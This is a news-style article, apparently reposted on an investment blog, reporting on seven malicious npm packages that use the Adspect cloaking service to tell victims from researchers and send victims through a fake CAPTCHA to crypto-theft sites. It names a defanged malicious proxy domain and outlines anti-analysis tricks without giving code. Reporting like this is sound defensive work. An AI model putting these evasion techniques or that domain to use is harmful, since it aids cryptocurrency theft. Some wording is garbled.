Cybersecurity researchers have uncovered a set of seven npm packages published by a single attacker. These packages use a cloaking service called Adspect to distinguish between real victims and security researchers, and ultimately redirect to sketchy crypto-themed sites.
Malicious npm packages were published by a threat actor named ‘dino_reborn’ between September and November 2025. Packages include signals-embed (342 downloads), dsidospsodlks (184 downloads), applicationooks21 (340 downloads), application-phskck (199 downloads), integrator-filescrypt2025 (199 downloads), integrator-2829 (276 downloads). downloads), integrator-2830 (290 downloads).
Adspect pretends to be a cloud-based service that protects your advertising campaigns
According to Adspect’s website, Adspect promotes a cloud-based service designed to protect ad campaigns from unwanted traffic such as click fraud and antivirus company bots. It also claims to offer “bulletproof cloaking” and “reliably cloak any advertising platform.”
There are three plans: Ant-Fraud, Personal, and Professional, with monthly fees of $299, $499, and $999. The company also claims users can promote “anything they want,” adding that it follows a no-questions-asked policy. That is, we don’t care what users do and we don’t enforce content rules. ”
Socket security researcher Olivia Brown said: “When a visitor visits a fake website built by one of the packages, the threat actor determines whether the visitor is a victim or a security researcher (…) If the visitor is a victim, a fake CAPTCHA is displayed, which ultimately leads to the malicious site. If the visitor is a security researcher, all they need to know is that something malicious may be happening on the fake website.”
AdSpect’s ability to block researchers’ actions in web browsers
Six of these packages contain 39kB of malware that hides itself and creates a fingerprint copy of the system. It also attempts to evade analysis by blocking developer actions in web browsers. This prevents researchers from viewing source code or launching developer tools.
These packages utilize a JavaScript feature called Immediately Invoked Function Expression (IIFE). This allows the malicious code to be executed as soon as it is loaded into the web browser.
However, ‘signals-embed’ has no fully malicious functionality and is designed to build decoy white pages. The captured information is sent to a proxy (‘association-google(.)xyz/adspect-proxy(.)php’) that determines whether the traffic source is from the victim or the researcher and provides a fake CAPTCHA.
Once a victim clicks on the CAPTCHA checkbox, they are redirected to a fake crypto-related page impersonating a service like StandX with the goal of stealing their digital assets. However, if a visitor is flagged as a potential researcher, a white fake page is displayed to the user. It also contains HTML code related to a display privacy policy associated with a fake company named Offlido.
This report matches the Amazon Web Services report. The company’s Amazon Inspector team says it has identified and reported more than 150,000 packages associated with a coordinated TEA token farming campaign in the npm registry, with origins in the first wave detected in April 2024.
“This is one of the largest package flood incidents in open source registry history and represents a defining moment in supply chain security.” Researchers Chi Tran and Charlie Bacon said:. “Threat actors are automatically generating and publishing packages to earn cryptocurrency rewards without users’ knowledge, revealing how this campaign has grown exponentially since it was first identified.”
Discover more from Earlybirds Invest
Subscribe to get the latest posts sent to your email.
